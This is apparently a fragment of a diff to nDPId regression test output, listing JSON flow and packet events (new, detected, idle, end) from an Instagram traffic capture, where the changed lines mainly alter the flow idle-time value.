+00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1436720898386,"flow_last_seen":1436720908442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":41200,"flow_avg_l4_payload_len":605,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265146,"flow_last_seen":1568796265146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796265146,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1568796265146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796265146,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDQAbvb0IW1AAAAALAC\/\/8u4wAAAgQFtAEDAwYBAQgKDXCenAAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2217,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265147,"flow_last_seen":1568796265147,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796265147,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2217,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1568796265147,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796265147,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDRAbs6ii8aAAAAALAC\/\/8mxAAAAgQFtAEDAwYBAQgKDXCenAAAAAAEAgAA"} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2218,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1568796265158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265158,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNDH6s7\/29CFtqASbHAaPQAAAgQFeAQCCApocroGDXCenAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2219,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1568796265159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265159,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNGAszpfOoovG6ASbHAHRwAAAgQFeAQCCApsGJ0PDXCenAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2220,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1568796265159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265159,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDQAbvb0IW2x+rPAIAQCAytJAAAAQEICg1wnqpocroG"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2221,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1568796265160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265160,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDRAbs6ii8bgLM6YIAQCAyaLgAAAQEICg1wnqpsGJ0P"} 
-00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2222,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265146,"flow_last_seen":1568796265162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2224,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265147,"flow_last_seen":1568796265162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
-00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2230,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265146,"flow_last_seen":1568796265175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265175,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2231,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265147,"flow_last_seen":1568796265176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265176,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1366,"flow_first_seen":1568796253770,"flow_last_seen":1568796268061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1220206,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1568796254514,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":97782,"flow_avg_l4_payload_len":679,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":388,"flow_first_seen":1568796254515,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":283610,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1568796254524,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155234,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":359,"flow_first_seen":1568796265146,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":272019,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":212,"flow_first_seen":1568796265147,"flow_last_seen":1568796268053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155200,"flow_avg_l4_payload_len":732,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match 
by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265146,"flow_last_seen":1568796265146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796265146,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1568796265146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796265146,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDQAbvb0IW1AAAAALAC\/\/8u4wAAAgQFtAEDAwYBAQgKDXCenAAAAAAEAgAA"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2217,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265147,"flow_last_seen":1568796265147,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796265147,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2217,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1568796265147,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796265147,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDRAbs6ii8aAAAAALAC\/\/8mxAAAAgQFtAEDAwYBAQgKDXCenAAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2218,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1568796265158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265158,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNDH6s7\/29CFtqASbHAaPQAAAgQFeAQCCApocroGDXCenAEDAwg="} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2219,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1568796265159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265159,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNGAszpfOoovG6ASbHAHRwAAAgQFeAQCCApsGJ0PDXCenAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2220,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1568796265159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265159,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDQAbvb0IW2x+rPAIAQCAytJAAAAQEICg1wnqpocroG"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2221,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1568796265160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265160,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDRAbs6ii8bgLM6YIAQCAyaLgAAAQEICg1wnqpsGJ0P"} 
+00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2222,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265146,"flow_last_seen":1568796265162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2224,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265147,"flow_last_seen":1568796265162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2230,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265146,"flow_last_seen":1568796265175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265175,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2231,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265147,"flow_last_seen":1568796265176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265176,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1366,"flow_first_seen":1568796253770,"flow_last_seen":1568796268061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1220206,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 